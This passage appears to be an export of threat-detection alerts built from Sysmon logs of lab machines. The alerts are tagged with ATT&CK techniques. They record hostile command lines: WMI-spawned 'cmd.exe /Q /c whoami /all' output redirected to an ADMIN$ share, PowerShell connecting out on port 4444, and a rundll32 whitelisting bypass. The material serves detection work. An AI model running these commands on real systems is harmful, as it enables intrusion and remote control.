<Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
<Data Name=""LogonId"">0x10896</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6231-5CC7-0000-00104CF71800</Data>
<Data Name=""ParentProcessId"">3940</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1618950794.860901,2021-04-21T00:33:14.860901+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:33:14.273416Z"">
</TimeCreated>
<EventRecordID>578505</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4112"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-20 20:33:14.246</Data>
<Data Name=""ProcessGuid"">747F3D96-3A8A-607F-0000-0010E4717700</Data>
<Data Name=""ProcessId"">5280</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-82AF-607F-0000-0020E5030000</Data>
<Data Name=""LogonId"">0x3e5</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">612</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237538.260138,2020-08-12T17:05:38.260138+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:05:20.378005Z"">
</TimeCreated>
<EventRecordID>342407</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:05:16.721</Data>
<Data Name=""ProcessGuid"">747F3D96-E90C-5F33-0000-0010CB420200</Data>
<Data Name=""ProcessId"">3320</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E909-5F33-0000-00108C580000</Data>
<Data Name=""ParentProcessId"">612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-29T20:59:21.539311Z"">
</TimeCreated>
<EventRecordID>8048</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1896"" ThreadID=""1820"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-29 20:59:21.539</Data>
<Data Name=""ProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
<Data Name=""ProcessId"">3376</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\invoke-pipeshell-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
<Data Name=""LogonId"">0x10896</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6231-5CC7-0000-00104CF71800</Data>
<Data Name=""ParentProcessId"">3940</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656513.512339,2019-05-01T00:35:13.512339+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:35:13.449839Z"">
</TimeCreated>
<EventRecordID>9838</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:35:13.434</Data>
<Data Name=""ProcessGuid"">365ABB72-B181-5CC8-0000-0010ADBF1E00</Data>
<Data Name=""ProcessId"">3372</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
<Data Name=""LogonId"">0x1ea3c6</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B17F-5CC8-0000-001082A51E00</Data>
<Data Name=""ParentProcessId"">3572</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\mmc.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.324839Z"">
</TimeCreated>
<EventRecordID>9828</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.324</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
<Data Name=""ProcessId"">2828</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.324839Z"">
</TimeCreated>
<EventRecordID>9828</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.324</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
<Data Name=""ProcessId"">2828</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.324839Z"">
</TimeCreated>
<EventRecordID>9828</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.324</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
<Data Name=""ProcessId"">2828</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (NT AUTHORITY\SYSTEM) ran process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated a network connection from hostname ( IEWIN7 ) and IP ( 10.0.2.18 ) to hostname ( ) , IP ( 10.0.2.19 ) and port ( 4444 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:54.152964Z"">
</TimeCreated>
<EventRecordID>9813</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1568"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:52.794</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8C-5CC8-0000-001003361900</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.18</Data>
<Data Name=""SourceHostname"">IEWIN7</Data>
<Data Name=""SourcePort"">49160</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.19</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">4444</Data>
<Data Name=""DestinationPortName""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,OpenURL ms-browser://)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
</TimeCreated>
<EventRecordID>340</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ProcessId"">3412</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1618950794.242705,2021-04-21T00:33:14.242705+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:33:13.741579Z"">
</TimeCreated>
<EventRecordID>578503</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4112"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-20 20:33:13.680</Data>
<Data Name=""ProcessGuid"">747F3D96-3A89-607F-0000-001028587700</Data>
<Data Name=""ProcessId"">4912</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-82AE-607F-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">612</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
</TimeCreated>
<EventRecordID>340</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ProcessId"">3412</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
